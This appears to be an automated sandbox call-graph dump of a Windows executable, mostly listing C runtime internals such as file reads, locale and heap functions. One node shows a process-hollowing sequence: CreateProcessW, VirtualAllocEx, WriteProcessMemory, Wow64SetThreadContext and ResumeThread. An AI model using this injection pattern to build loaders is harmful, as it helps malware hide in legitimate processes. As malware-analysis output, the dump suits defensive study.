da4cbf 18532->18533 18534 da4cd4 HeapSize 18532->18534 18535 d934c5 __dosmaperr 14 API calls 18533->18535 18534->18462 18536 da4cc4 18535->18536 18537 d93bb0 __strnicoll 29 API calls 18536->18537 18538 da4ccf 18537->18538 18538->18462 18540 da1270 18539->18540 18541 da1265 18539->18541 18543 da1278 18540->18543 18549 da1281 __Getctype 18540->18549 18542 d97381 __fread_nolock 15 API calls 18541->18542 18544 da126d 18542->18544 18545 d97347 ___free_lconv_mon 14 API calls 18543->18545 18544->18467 18545->18544 18546 da12ab HeapReAlloc 18546->18544 18546->18549 18547 da1286 18548 d934c5 __dosmaperr 14 API calls 18547->18548 18548->18544 18549->18546 18549->18547 18550 d91650 codecvt 2 API calls 18549->18550 18550->18549 18552 d8e7da __strnicoll 39 API calls 18551->18552 18553 d986d3 18552->18553 18554 d986e5 18553->18554 18559 d97e9d 18553->18559 18556 d8e8d4 18554->18556 18565 d8e92c 18556->18565 18562 d984b2 18559->18562 18563 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 18562->18563 18564 d97ea5 18563->18564 18564->18554 18566 d8e93a 18565->18566 18567 d8e954 18565->18567 18583 d8e8ba 18566->18583 18568 d8e97a 18567->18568 18569 d8e95b 18567->18569 18571 d973cf __fread_nolock MultiByteToWideChar 18568->18571 18582 d8e8ec 18569->18582 18587 d8e87b 18569->18587 18573 d8e989 18571->18573 18574 d8e990 GetLastError 18573->18574 18576 d8e9b6 18573->18576 18577 d8e87b 15 API calls 18573->18577 18592 d934eb 18574->18592 18578 d973cf __fread_nolock MultiByteToWideChar 18576->18578 18576->18582 18577->18576 18580 d8e9cd 18578->18580 18580->18574 18580->18582 18582->18473 18582->18474 18584 d8e8cd 18583->18584 18585 d8e8c5 18583->18585 18584->18582 18586 d97347 ___free_lconv_mon 14 API calls 18585->18586 18586->18584 18588 d8e8ba 14 API calls 18587->18588 18589 d8e889 18588->18589 18597 d8e85c 18589->18597 18600 d934d8 18592->18600 18594 d934f6 __dosmaperr 18598 d97381 __fread_nolock 15 API calls 18597->18598 18599 d8e869 18598->18599 18599->18582 18601 d97724 __dosmaperr 14 API calls 18600->18601 18602 d934dd 18601->18602 18602->18594 18623 d88b60 18603->18623 18607 d816ae 18606->18607 18608 d816c2 GetCurrentThreadId 18607->18608 18609 d896a8 std::_Throw_Cpp_error 30 API calls 18607->18609 18610 d816e9 18608->18610 18611 d816dd 18608->18611 18609->18608 18635 d88c30 18623->18635 18625 d88b8e std::_Throw_Cpp_error 18644 d91131 18625->18644 18627 d88bdd 18628 d88bfa 18627->18628 18629 d88bed 18627->18629 18663 d896a8 18628->18663 18659 d842d0 18629->18659 18632 d88bf5 18633 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18632->18633 18634 d817ad 18633->18634 18634->17639 18669 d88e36 18635->18669 18642 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18643 d88c8c 18642->18643 18643->18625 18645 d9113e 18644->18645 18646 d91152 18644->18646 18648 d934c5 __dosmaperr 14 API calls 18645->18648 18696 d911c2 18646->18696 18650 d91143 18648->18650 18652 d93bb0 __strnicoll 29 API calls 18650->18652 18651 d91167 CreateThread 18653 d91192 18651->18653 18654 d91186 GetLastError 18651->18654 18713 d91249 18651->18713 18655 d9114e 18652->18655 18705 d91212 18653->18705 18656 d934eb __dosmaperr 14 API calls 18654->18656 18655->18627 18656->18653 18660 d842fc 18659->18660 18661 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18660->18661 18662 d84309 18661->18662 18662->18632 18664 d896be std::_Throw_Cpp_error 18663->18664 18934 d896e3 18664->18934 18670 d88e3b ___std_exception_copy 18669->18670 18671 d88c58 18670->18671 18672 d91650 codecvt 2 API calls 18670->18672 18673 d88e57 18670->18673 18680 d88d10 18671->18680 18672->18670 18674 d88e61 Concurrency::cancel_current_task 18673->18674 18675 d8b09b codecvt 18673->18675 18689 d8c47a 18674->18689 18676 d8c47a CallUnexpected RaiseException 18675->18676 18678 d8b0b7 18676->18678 18679 d897a4 18692 d88a50 18680->18692 18683 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18684 d88c6e 18683->18684 18685 d84280 18684->18685 18686 d842b0 18685->18686 18687 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18686->18687 18688 d842bd 18687->18688 18688->18642 18690 d8c4c2 RaiseException 18689->18690 18691 d8c494 18689->18691 18690->18679 18691->18690 18693 d88a79 18692->18693 18694 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18693->18694 18695 d88a97 18694->18695 18695->18683 18697 d98700 __Getctype 14 API calls 18696->18697 18698 d911d3 18697->18698 18699 d97347 ___free_lconv_mon 14 API calls 18698->18699 18700 d911e0 18699->18700 18701 d91204 18700->18701 18702 d911e7 GetModuleHandleExW 18700->18702 18703 d91212 16 API calls 18701->18703 18702->18701 18704 d9115e 18703->18704 18704->18651 18704->18653 18706 d9121e 18705->18706 18707 d9119d 18705->18707 18708 d9122d 18706->18708 18709 d91224 CloseHandle 18706->18709 18707->18627 18710 d9123c 18708->18710 18711 d91233 FreeLibrary 18708->18711 18709->18708 18712 d97347 ___free_lconv_mon 14 API calls 18710->18712 18711->18710 18712->18707 18714 d91255 ___scrt_is_nonwritable_in_current_image 18713->18714 18715 d91269 18714->18715 18716 d9125c GetLastError ExitThread 18714->18716 18717 d975d3 __Getctype 39 API calls 18715->18717 18718 d9126e 18717->18718 18730 d9ab1b 18718->18730 18720 d91285 18734 d88ca0 18720->18734 18743 d888d0 18720->18743 18731 d9ab2b std::locale::_Setgloballocale 18730->18731 18732 d91279 18730->18732 18731->18732 18758 d982e0 18731->18758 18732->18720 18752 d98237 18732->18752 18735 d84280 5 API calls 18734->18735 18753 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 18752->18753 18754 d98253 18753->18754 18754->18720 18759 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 18758->18759 18760 d982fc 18759->18760 18760->18732 18935 d896ef __EH_prolog3_GS 18934->18935 18936 d81040 std::_Throw_Cpp_error 30 API calls 18935->18936 18937 d89703 18936->18937 18944 d832c0 18937->18944 18958 d83470 18944->18958 18959 d83494 std::_Throw_Cpp_error 18958->18959 18982 d83a80 18959->18982 18995 d81db0 18982->18995 18996 d81dcb std::_Throw_Cpp_error 18995->18996 20498 d8a489 20499 d8a49f _Yarn 20498->20499 20500 d8a4a5 20499->20500 20501 d8a54b 20499->20501 20504 d94a84 20499->20504 20501->20500 20503 d94a84 __fread_nolock 45 API calls 20501->20503 20503->20500 20507 d949e7 20504->20507 20508 d949f3 ___scrt_is_nonwritable_in_current_image 20507->20508 20509 d94a3d 20508->20509 20510 d94a06 __fread_nolock 20508->20510 20519 d94a2b 20508->20519 20520 d8f144 EnterCriticalSection 20509->20520 20512 d934c5 __dosmaperr 14 API calls 20510->20512 20514 d94a20 20512->20514 20513 d94a47 20521 d94aa1 20513->20521 20516 d93bb0 __strnicoll 29 API calls 20514->20516 20516->20519 20519->20499 20520->20513 20524 d94ab3 __fread_nolock 20521->20524 20527 d94a5e 20521->20527 20522 d94ac0 20523 d934c5 __dosmaperr 14 API calls 20522->20523 20525 d94ac5 20523->20525 20524->20522 20524->20527 20530 d94b11 20524->20530 20526 d93bb0 __strnicoll 29 API calls 20525->20526 20526->20527 20535 d94a7c 20527->20535 20528 d9fa2e __fread_nolock 43 API calls 20528->20530 20529 d94c3c __fread_nolock 20533 d934c5 __dosmaperr 14 API calls 20529->20533 20530->20527 20530->20528 20530->20529 20531 d94966 __fread_nolock 29 API calls 20530->20531 20532 d9aab8 __fread_nolock 29 API calls 20530->20532 20534 d9ff39 __fread_nolock 41 API calls 20530->20534 20531->20530 20532->20530 20533->20525 20534->20530 20538 d8f158 LeaveCriticalSection 20535->20538 20537 d94a82 20537->20519 20538->20537 20550 d942be 20551 d942d0 20550->20551 20553 d942d9 ___scrt_uninitialize_crt 20550->20553 20552 d9443c ___scrt_uninitialize_crt 68 API calls 20551->20552 20554 d942d6 20552->20554 20555 d942e8 20553->20555 20558 d945c1 20553->20558 20559 d945cd ___scrt_is_nonwritable_in_current_image 20558->20559 20566 d8f144 EnterCriticalSection 20559->20566 20561 d945db 20562 d9431a ___scrt_uninitialize_crt 68 API calls 20561->20562 20563 d945ec 20562->20563 20567 d94615 20563->20567 20566->20561 20570 d8f158 LeaveCriticalSection 20567->20570 20569 d9430f 20570->20569 17587 db21a9 17589 db21df 17587->17589 17588 db232c GetPEB 17590 db233e CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 17588->17590 17589->17588 17589->17590 17590->17589 17591 db23e5 WriteProcessMemory 17590->17591 17592 db242a 17591->17592 17593 db242f WriteProcessMemory 17592->17593 17594 db246c WriteProcessMemory Wow64SetThreadContext ResumeThread 17592->17594 17593->17592 20685 d954a4 20686 d954b7 _Fputc 20685->20686 20689 d95511 20686->20689 20688 d954cc _Fputc 20690 d95523 20689->20690 20693 d95546 20689->20693 20691 d93d59 __strnicoll 29 API calls 20690->20691 20692 d9553e 20691->20692 20692->20688 20693->20690 20694 d9556d 20693->20694 20697 d95647 20694->20697 20698 d95653 ___scrt_is_nonwritable_in_current_image 20697->20698 20705 d8f144 EnterCriticalSection 20698->20705 20700 d95661 20706 d955a7 20700->20706 20702 d9566e 20715 d95696 20702->20715 20705->20700 20707 d9437f ___scrt_uninitialize_crt 64 API calls 20706->20707 20708 d955c2 20707->20708 20718 d99c82 20708->20718 20711 d955e7 20711->20702 20712 d98700 __Getctype 14 API calls 20713 d9560b 20712->20713 20714 d97347 ___free_lconv_mon 14 API calls 20713->20714 20714->20711 20722 d8f158 LeaveCriticalSection 20715->20722 20717 d955a5 20717->20688 20719 d99c99 20718->20719 20720 d955cc 20718->20720 20719->20720 20721 d97347 ___free_lconv_mon 14 API calls 20719->20721 20720->20711 20720->20712 20721->20720 20722->20717 20807 d85850 20808 d858b6 20807->20808 20815 d865f0 20808->20815 20852 d87580 20815->20852 20818 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20819 d8590d 20818->20819 20820 d85ed0 20819->20820 20821 d85f29 20820->20821 21113 d83ec0 20821->21113 20823 d86008 std::ios_base::_Ios_base_dtor 21132 d86660 20823->21132 20825 d8603a 21138 d86720 20825->21138 20828 d8609b std::ios_base::_Ios_base_dtor 20832 d86179 20828->20832 21157 d86880 20828->21157 20829 d86342 20830 d86439 20829->20830 20831 d86352 20829->20831 20837 d86a10 69 API calls 20830->20837 20836 d86a10 69 API calls 20831->20836 20832->20829 20833 d86267 20832->20833 21164 d86990 20833->21164 20835 d862b1 21168 d86a10 20835->21168 20838 d863b8 20836->20838 20841 d8632c 20837->20841 20840 d86990 69 API calls 20838->20840 20840->20841 20842 d86a10 69 API calls 20841->20842 20843 d86542 20842->20843 20853 d875b2 20852->20853 20856 d8f368 20853->20856 20855 d86636 20855->20818 20857 d8f37c _Fputc 20856->20857 20860 d8f6ab 20857->20860 20859 d8f397 _Fputc 20859->20855 20861 d8f6da 20860->20861 20862 d8f6b7 20860->20862 20867 d8f701 20861->20867 20868 d8f849 20861->20868 20863 d93d59 __strnicoll 29 API calls 20862->20863 20866 d8f6d2 20863->20866 20865 d93d59 __strnicoll 29 API calls 20865->20866 20866->20859 20867->20865 20867->20866 20869 d8f898 20868->20869 20870 d8f875 20868->20870 20869->20870 20874 d8f8a0 20869->20874 20871 d93d59 __strnicoll 29 API calls 20870->20871 20872 d8f88d 20871->20872 20873 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20872->20873 20875 d8f9bb 20873->20875 20879 d8faa5 20874->20879 20875->20867 20896 d8f74a 20879->20896 20881 d8fabf 20882 d8faca 20881->20882 20883 d8f921 20881->20883 20887 d8f4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 20881->20887 20889 d8fbce 20881->20889 20900 d8fd89 20881->20900 20903 d8fe01 20881->20903 20937 d8ff5a 20881->20937 20884 d93d59 __strnicoll 29 API calls 20882->20884 20893 d8f581 20883->20893 20884->20883 20887->20881 20890 d93d59 __strnicoll 29 API calls 20889->20890 20891 d8fbe8 20890->20891 20892 d93d59 __strnicoll 29 API calls 20891->20892 20892->20883 20894 d97347 ___free_lconv_mon 14 API calls 20893->20894 20895 d8f591 20894->20895 20895->20872 20897 d8f755 20896->20897 20899 d8f76e 20896->20899 20898 d93d59 __strnicoll 29 API calls 20897->20898 20898->20899 20899->20881 20966 d9071b 20900->20966 20902 d8fdc4 20902->20881 20904 d8fe08 20903->20904 20905 d8fe1f 20903->20905 20907 d8ffdf 20904->20907 20908 d8ff7f 20904->20908 20918 d8fe5e 20904->20918 20906 d93d59 __strnicoll 29 API calls 20905->20906 20905->20918 20911 d8fe53 20906->20911 20909 d90018 20907->20909 20910 d8ffe4 20907->20910 20912 d90005 20908->20912 20913 d8ff85 20908->20913 20914 d9001d 20909->20914 20915 d90035 20909->20915 20916 d90011 20910->20916 20917 d8ffe6 20910->20917 20911->20881 21007 d90c44 20912->21007 20924 d8ff8a 20913->20924 20925 d8ffd6 20913->20925 20914->20912 20914->20925 20935 d8ffb0 20914->20935 21018 d905d1 20915->21018 21014 d905b4 20916->21014 20922 d8ff99 20917->20922 20928 d8fff5 20917->20928 20918->20881 20936 d9003e 20922->20936 20982 d90423 20922->20982 20924->20922 20926 d8ffc3 20924->20926 20924->20935 20925->20936 20996 d9092a 20925->20996 20926->20936 20992 d902b9 20926->20992 20928->20912 20930 d8fff9 20928->20930 20930->20936 21003 d905e7 20930->21003 20931 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20932 d902b7 20931->20932 20932->20881 20935->20936 21021 d9a81b 20935->21021 20936->20931 20938 d8ffdf 20937->20938 20939 d8ff7f 20937->20939 20940 d90018 20938->20940 20941 d8ffe4 20938->20941 20942 d90005 20939->20942 20943 d8ff85 20939->20943 20944 d9001d 20940->20944 20945 d90035 20940->20945 20946 d90011 20941->20946 20947 d8ffe6 20941->20947 20949 d90c44 30 API calls 20942->20949 20953 d8ff8a 20943->20953 20954 d8ffd6 20943->20954 20944->20942 20944->20954 20964 d8ffb0 20944->20964 20948 d905d1 30 API calls 20945->20948 20950 d905b4 30 API calls 20946->20950 20951 d8ff99 20947->20951 20957 d8fff5 20947->20957 20948->20964 20949->20964 20950->20964 20952 d90423 42 API calls 20951->20952 20965 d9003e 20951->20965 20952->20964 20953->20951 20955 d8ffc3 20953->20955 20953->20964 20956 d9092a 30 API calls 20954->20956 20954->20965 20959 d902b9 41 API calls 20955->20959 20955->20965 20956->20964 20957->20942 20958 d8fff9 20957->20958 20962 d905e7 29 API calls 20958->20962 20958->20965 20959->20964 20960 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20961 d902b7 20960->20961 20961->20881 20962->20964 20963 d9a81b 41 API calls 20963->20964 20964->20963 20964->20965 20965->20960 20967 d906a9 29 API calls 20966->20967 20968 d9072d 20967->20968 20969 d90742 20968->20969 20972 d90775 20968->20972 20975 d9075d 20968->20975 20970 d93d59 __strnicoll 29 API calls 20969->20970 20970->20975 20971 d9080c 20973 d906f2 29 API calls 20971->20973 20972->20971 20976 d906f2 20972->20976 20973->20975 20975->20902 20977 d90717 20976->20977 20978 d90703 20976->20978 20977->20971 20978->20977 20979 d934c5 __dosmaperr 14 API calls 20978->20979 20980 d9070c 20979->20980 20981 d93bb0 __strnicoll 29 API calls 20980->20981 20981->20977 20983 d9043d 20982->20983 21031 d8f9bd 20983->21031 20985 d9047c 21042 d99d24 20985->21042 20988 d90533 20990 d8f4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 20988->20990 20991 d90566 20988->20991 20989 d8f4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 20989->20988 20990->20991 20991->20935 20991->20991 20993 d902d4 20992->20993 20994 d9030a 20993->20994 20995 d9a81b 41 API calls 20993->20995 20994->20935 20995->20994 20997 d9093f 20996->20997 20998 d90961 20997->20998 20999 d90988 20997->20999 21000 d93d59 __strnicoll 29 API calls 20998->21000 21001 d8f9bd 15 API calls 20999->21001 21002 d9097e 20999->21002 21000->21002 21001->21002 21002->20935 21006 d905fd 21003->21006 21004 d93d59 __strnicoll 29 API calls 21005 d9061e 21004->21005 21005->20935 21006->21004 21006->21005 21008 d90c59 21007->21008 21009 d90c7b 21008->21009 21011 d90ca2 21008->21011 21010 d93d59 __strnicoll 29 API calls 21009->21010 21013 d90c98 21010->21013 21012 d8f9bd 15 API calls 21011->21012 21011->21013 21012->21013 21013->20935 21015 d905c0 21014->21015 21106 d90ab7 21015->21106 21017 d905d0 21017->20935 21019 d9092a 30 API calls 21018->21019 21020 d905e6 21019->21020 21020->20935 21022 d9a830 21021->21022 21023 d9a871 21022->21023 21024 d8f4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21022->21024 21025 d9a834 __fread_nolock std::_Locinfo::_Locinfo_dtor 21022->21025 21027 d9a85d __fread_nolock 21022->21027 21023->21025 21023->21027 21028 d97491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 21023->21028 21024->21023 21025->20935 21026 d93d59 __strnicoll 29 API calls 21026->21025 21027->21025 21027->21026 21029 d9a92c 21028->21029 21029->21025 21030 d9a942 GetLastError 21029->21030 21030->21025 21030->21027 21032 d8f9e4 21031->21032 21039 d8f9d2 21031->21039 21033 d97381 __fread_nolock 15 API calls 21032->21033 21032->21039 21034 d8fa08 21033->21034 21035 d8fa1b 21034->21035 21036 d8fa10 21034->21036 21061 d8f55d 21035->21061 21037 d97347 ___free_lconv_mon 14 API calls 21036->21037 21037->21039 21039->20985 21041 d97347 ___free_lconv_mon 14 API calls 21041->21039 21043 d99d59 21042->21043 21044 d99d35 21042->21044 21043->21044 21046 d99d8c 21043->21046 21045 d93d59 __strnicoll 29 API calls 21044->21045 21058 d9050f 21045->21058 21047 d99dc5 21046->21047 21049 d99df4 21046->21049 21064 d99ed9 21047->21064 21048 d99e1d 21052 d99e4a 21048->21052 21053 d99e84 21048->21053 21049->21048 21050 d99e22 21049->21050 21072 d9a29b 21050->21072 21055 d99e6a 21052->21055 21056 d99e4f 21052->21056 21099 d9a0c1 21053->21099 21092 d9a6b6 21055->21092 21082 d9a74c 21056->21082 21058->20988 21058->20989 21062 d97347 ___free_lconv_mon 14 API calls 21061->21062 21063 d8f56c 21062->21063 21063->21041 21065 d99efa 21064->21065 21066 d99eef 21064->21066 21067 d96fbc ___std_exception_copy 29 API calls 21065->21067 21066->21058 21068 d99f55 21067->21068 21069 d99f5f 21068->21069 21070 d93bdd __Getctype 11 API calls 21068->21070 21069->21058 21071 d99f6d 21070->21071 21073 d9a2ae 21072->21073 21074 d9a2bd 21073->21074 21075 d9a2df 21073->21075 21078 d93d59 __strnicoll 29 API calls 21074->21078 21076 d9a2f4 21075->21076 21077 d9a347 21075->21077 21079 d9a0c1 41 API calls 21076->21079 21080 d8f4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21077->21080 21081 d9a2d5 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strrchr __allrem 21077->21081 21078->21081 21079->21081 21080->21081 21081->21058 21083 da29f2 31 API calls 21082->21083 21084 d9a77c 21083->21084 21085 da2847 29 API calls 21084->21085 21086 d9a7ba 21085->21086 21087 d9a7c1 21086->21087 21088 d9a7fa 21086->21088 21090 d9a7d3 21086->21090 21087->21058 21089 d99f6e 41 API calls 21088->21089 21089->21087 21091 d9a5c8 39 API calls 21090->21091 21091->21087 21093 da29f2 31 API calls 21092->21093 21094 d9a6e5 21093->21094 21095 da2847 29 API calls 21094->21095 21096 d9a726 21095->21096 21097 d9a72d 21096->21097 21098 d9a5c8 39 API calls 21096->21098 21097->21058 21098->21097 21100 da29f2 31 API calls 21099->21100 21101 d9a0eb 21100->21101 21102 da2847 29 API calls 21101->21102 21103 d9a139 21102->21103 21104 d9a140 21103->21104 21105 d99f6e 41 API calls 21103->21105 21104->21058 21105->21104 21107 d90acc 21106->21107 21108 d90aee 21107->21108 21111 d90b15 21107->21111 21109 d93d59 __strnicoll 29 API calls 21108->21109 21110 d90b0b 21109->21110 21110->21017 21111->21110 21112 d8f9bd 15 API calls 21111->21112 21112->21110 21114 d891bd std::_Lockit::_Lockit 7 API calls 21113->21114 21115 d83ee4 21114->21115 21172 d84080 21115->21172 21117 d83efa 21118 d83f25 21117->21118 21180 d841b0 21117->21180 21119 d891ee std::_Lockit::~_Lockit 2 API calls 21118->21119 21121 d83fb0 21119->21121 21123 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21121->21123 21125 d83fba 21123->21125 21124 d83f50 21127 d84280 5 API calls 21124->21127 21125->20823 21128 d83f64 21127->21128 21196 d89261 21128->21196 21131 d842d0 5 API calls 21131->21118 21133 d8668c std::_Throw_Cpp_error 21132->21133 21423 d86aa0 21133->21423 21136 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21137 d866b2 21136->21137 21137->20825 21139 d891bd std::_Lockit::_Lockit 7 API calls 21138->21139 21140 d86744 21139->21140 21141 d84080 14 API calls 21140->21141 21142 d8675a 21141->21142 21143 d86785 21142->21143 21436 d86c80 21142->21436 21144 d891ee std::_Lockit::~_Lockit 2 API calls 21143->21144 21145 d86810 21144->21145 21147 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21145->21147 21150 d8681a 21147->21150 21149 d867b0 21152 d84280 5 API calls 21149->21152 21150->20828 21151 d84250 RaiseException 21151->21149 21153 d867c4 21152->21153 21154 d89261 RaiseException 21153->21154 21155 d867d2 21154->21155 21156 d842d0 5 API calls 21155->21156 21156->21143 21510 d87320 21157->21510 21161 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21163 d86978 21161->21163 21162 d868cd std::_Throw_Cpp_error 21162->21161 21163->20828 21167 d869af std::_Throw_Cpp_error 21164->21167 21165 d869f1 21165->20835 21167->21165 21549 d87510 21167->21549 21173 d840de 21172->21173 21174 d840a2 21172->21174 21176 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21173->21176 21175 d891bd std::_Lockit::_Lockit 7 API calls 21174->21175 21177 d840b3 21175->21177 21178 d840f0 21176->21178 21179 d891ee std::_Lockit::~_Lockit 2 API calls 21177->21179 21178->21117 21179->21173 21181 d8422c 21180->21181 21183 d841d0 21180->21183 21182 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21181->21182 21184 d83f42 21182->21184 21183->21181 21185 d88e36 codecvt 3 API calls 21183->21185 21184->21124 21192 d84250 21184->21192 21186 d841e8 codecvt 21185->21186 21201 d843b0 21186->21201 21193 d84268 21192->21193 21194 d8c47a CallUnexpected RaiseException 21193->21194 21195 d8427d 21194->21195 21197 d8926c ___std_exception_copy 21196->21197 21198 d83f72 21197->21198 21419 d89788 21197->21419 21198->21131 21202 d891bd std::_Lockit::_Lockit 7 API calls 21201->21202 21203 d843d0 codecvt 21202->21203 21204 d8443b 21203->21204 21205 d8441f 21203->21205 21240 d897e5 21204->21240 21231 d892e3 21205->21231 21247 d95217 21231->21247 21235 d89308 21236 d89317 21235->21236 21238 d95217 std::_Locinfo::_Locinfo_dtor 46 API calls 21235->21238 21238->21236 21378 d898d2 21240->21378 21243 d8c47a CallUnexpected RaiseException 21244 d89804 21243->21244 21245 d822b0 std::bad_exception::bad_exception 29 API calls 21244->21245 21246 d84449 21245->21246 21248 d9832b std::_Locinfo::_Locinfo_dtor 5 API calls 21247->21248 21249 d95224 21248->21249 21256 d95449 21249->21256 21252 d89349 21253 d89357 21252->21253 21255 d89363 _Yarn ___std_exception_copy 21252->21255 21254 d94c7a ___vcrt_freefls@4 14 API calls 21253->21254 21253->21255 21254->21255 21255->21235 21257 d95455 ___scrt_is_nonwritable_in_current_image 21256->21257 21264 d93ea8 EnterCriticalSection 21257->21264 21259 d95463 21265 d952ea 21259->21265 21261 d95470 21293 d95498 21261->21293 21264->21259 21296 d9524f 21265->21296 21267 d95305 21268 d975d3 __Getctype 39 API calls 21267->21268 21292 d95350 21267->21292 21269 d95312 21268->21269 21343 da15a1 21269->21343 21292->21261 21377 d93ebf LeaveCriticalSection 21293->21377 21295 d892f0 21295->21252 21297 d95269 21296->21297 21298 d9525b 21296->21298 21363 da12c1 21297->21363 21348 d917af 21298->21348 21301 d95280 21303 d952df 21301->21303 21304 d98700 __Getctype 14 API calls 21301->21304 21302 d95265 21302->21267 21305 d93bdd __Getctype 11 API calls 21303->21305 21306 d9529b 21304->21306 21307 d952e9 21305->21307 21308 d952c3 21306->21308 21310 da12c1 std::_Locinfo::_Locinfo_dtor 41 API calls 21306->21310 21312 d9524f std::_Locinfo::_Locinfo_dtor 46 API calls 21307->21312 21309 d97347 ___free_lconv_mon 14 API calls 21308->21309 21311 d952d8 21309->21311 21313 d952b2 21310->21313 21311->21267 21314 d95305 21312->21314 21315 d952b9 21313->21315 21316 d952c5 21313->21316 21318 d975d3 __Getctype 39 API calls 21314->21318 21342 d95350 21314->21342 21315->21303 21315->21308 21317 d917af std::_Locinfo::_Locinfo_dtor 43 API calls 21316->21317 21317->21308 21319 d95312 21318->21319 21320 da15a1 std::_Locinfo::_Locinfo_dtor 41 API calls 21319->21320 21321 d95337 21320->21321 21322 d9533e 21321->21322 21323 d97381 __fread_nolock 15 API calls 21321->21323 21325 d93bdd __Getctype 11 API calls 21322->21325 21322->21342 21324 d95363 21323->21324 21326 da15a1 std::_Locinfo::_Locinfo_dtor 41 API calls 21324->21326 21324->21342 21330 d95448 ___scrt_is_nonwritable_in_current_image 21325->21330 21342->21267 21344 da15b5 _Fputc 21343->21344 21368 da1886 21344->21368 21349 d917d9 21348->21349 21350 d917c5 21348->21350 21352 d975d3 __Getctype 39 API calls 21349->21352 21351 d934c5 __dosmaperr 14 API calls 21350->21351 21353 d917ca 21351->21353 21354 d917de 21352->21354 21355 d93bb0 __strnicoll 29 API calls 21353->21355 21356 d9832b std::_Locinfo::_Locinfo_dtor 5 API calls 21354->21356 21357 d917d5 21355->21357 21358 d917e6 21356->21358 21357->21302 21359 d9bc44 __Getctype 39 API calls 21358->21359 21360 d917eb 21359->21360 21361 d92dc4 std::_Locinfo::_Locinfo_dtor 43 API calls 21360->21361 21362 d9182d 21361->21362 21362->21302 21364 da12d4 _Fputc 21363->21364 21365 da14c5 std::_Locinfo::_Locinfo_dtor 41 API calls 21364->21365 21366 da12ec _Fputc 21365->21366 21366->21301 21369 da189d 21368->21369 21370 da18c7 21369->21370 21372 da18a1 21369->21372 21371 d93d59 __strnicoll 29 API calls 21370->21371 21376 da18df 21371->21376 21373 da15df std::_Locinfo::_Locinfo_dtor 41 API calls 21372->21373 21375 da18bf 21372->21375 21373->21375 21374 d93d59 __strnicoll 29 API calls 21374->21376 21375->21374 21375->21376 21377->21295 21379 d83be0 std::invalid_argument::invalid_argument 29 API calls 21378->21379 21380 d897f6 21379->21380 21380->21243 21420 d89796 Concurrency::cancel_current_task 21419->21420 21421 d8c47a CallUnexpected RaiseException 21420->21421 21422 d897a4 21421->21422 21424 d81db0 std::_Throw_Cpp_error 5 API calls 21423->21424 21425 d86acd 21424->21425 21426 d81e30 std::_Throw_Cpp_error 30 API calls 21425->21426 21427 d86adf std::_Throw_Cpp_error 21425->21427 21426->21427 21428 d81db0 std::_Throw_Cpp_error 5 API calls 21427->21428 21433 d86b18 std::_Throw_Cpp_error 21427->21433 21429 d86b75 21428->21429 21430 d81eb0 std::_Throw_Cpp_error 5 API calls 21429->21430 21431 d86b8c 21430->21431 21432 d81f50 std::_Throw_Cpp_error 30 API calls 21431->21432 21432->21433 21434 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21433->21434 21435 d866a5 21434->21435 21435->21136 21437 d86ca0 21436->21437 21438 d86d04 21436->21438 21437->21438 21440 d88e36 codecvt 3 API calls 21437->21440 21439 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21438->21439 21441 d867a2 21439->21441 21442 d86cb8 codecvt 21440->21442 21441->21149 21441->21151 21443 d843b0 codecvt 48 API calls 21442->21443 21444 d86cce 21443->21444 21448 d86d20 21444->21448 21449 